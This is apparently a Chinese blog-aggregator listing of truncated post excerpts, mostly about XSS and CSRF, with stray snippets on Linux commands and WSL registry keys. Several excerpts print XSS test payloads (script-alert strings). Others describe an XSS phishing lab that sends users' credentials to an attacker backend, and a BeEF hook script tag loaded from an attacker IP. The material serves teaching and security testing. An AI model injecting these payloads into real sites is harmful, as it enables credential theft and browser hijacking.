首先新建一个Xss处理的帮助类 public static class XSSHelper { /// <summary> /// XSS过滤 /// </summary> /// <param name="html">html代码</param> /// <returns>过滤结果</return ...
分类:
Web程序 时间:
2020-07-15 01:28:29
阅读次数:
98
X00 <script>alert(1)</script> X01 </textarea><script>alert(1)</script><textarea> X02 "><script>alert(1)</script><" X03 将()替换成空字符 <script>alert`1`</scr ...
分类:
其他好文 时间:
2020-07-14 18:21:47
阅读次数:
78
pikachu之XSS钓鱼 实验思路:在一个存在xss漏洞的一个页面上面嵌入一个请求,当用户打开这个页面时候页面会向我们的后台去发送一个请求,这个请求会返回一个要求用户进行basic认证的一个头部,这时在用户的界面会弹出一个需要身份验证的提示框。当用户在这上面进行认证时,用户的账号密码就会被发送到我 ...
分类:
其他好文 时间:
2020-07-14 00:50:31
阅读次数:
119
前言 学习xss的时候翻阅资料发现了一个文件上传漏洞fuzz字典生成脚本小工具,试了试还不错,分享一下 配置 需要python2环境 工具地址:https://github.com/c0ny1/upload-fuzz-dic-builder 使用方法 $ python upload-fuzz-dic ...
分类:
Web程序 时间:
2020-07-12 22:27:18
阅读次数:
94
常见的浏览器攻击分为两种,一种为XSS(跨站脚本攻击),另一种则为CSRF(跨站请求伪造)。 XSS(跨站脚本攻击) 定义 XSS 全称是 Cross Site Scripting,为了与“CSS”区分开来,故简称 XSS,翻译过来就是“跨站脚本”。XSS 攻击是指黑客往 HTML 文件中或者 DO ...
分类:
其他好文 时间:
2020-07-12 16:45:33
阅读次数:
123
#前言 XSS又叫跨站脚本攻击,是一种对网站应用程序的安全漏洞攻击技术。它允许恶意用户将代码注入网页,其他用户在浏览网页时就会受到影响。XSS分为三种:反射型,存储型,和DOM型。下面我会构造有缺陷的代码,从代码分析这三种类型。 如果想要了解XSS基础的可以看我的这篇文章:XSS(跨站脚本攻击)简单 ...
分类:
其他好文 时间:
2020-07-12 01:06:50
阅读次数:
132
系统信息 arch 显示机器的处理器架构uname -m 显示机器的处理器架构uname -r 显示正在使用的内核版本 dmidecode -q 显示硬件系统部件 - (SMBIOS / DMI) hdparm -i /dev/hda 罗列一个磁盘的架构特性 hdparm -tT /dev/sda ...
分类:
系统相关 时间:
2020-07-12 01:01:59
阅读次数:
274
启动beef和apache 修改主页,在网页中添加 <script src='http://IP:3000/hook.js'></script> xss漏洞利用 篡改网页a标签中的连接 <script> window.onload = function(){ var link = document. ...
分类:
其他好文 时间:
2020-07-11 12:33:13
阅读次数:
57
注册表位置: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\ 值 Key 类型 描述 DefaultDistribution REG_SZ 默认发行版 DefaultVersion REG_DWORD 默认WSL版本 项 Key 类型 描述 ...
分类:
其他好文 时间:
2020-07-10 15:07:13
阅读次数:
110
一.CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 CSRF XSS的区别与联系 XSS 利用的是用户对指定网站的信任,CSRF 利用的 ...
分类:
其他好文 时间:
2020-07-10 09:36:06
阅读次数:
84
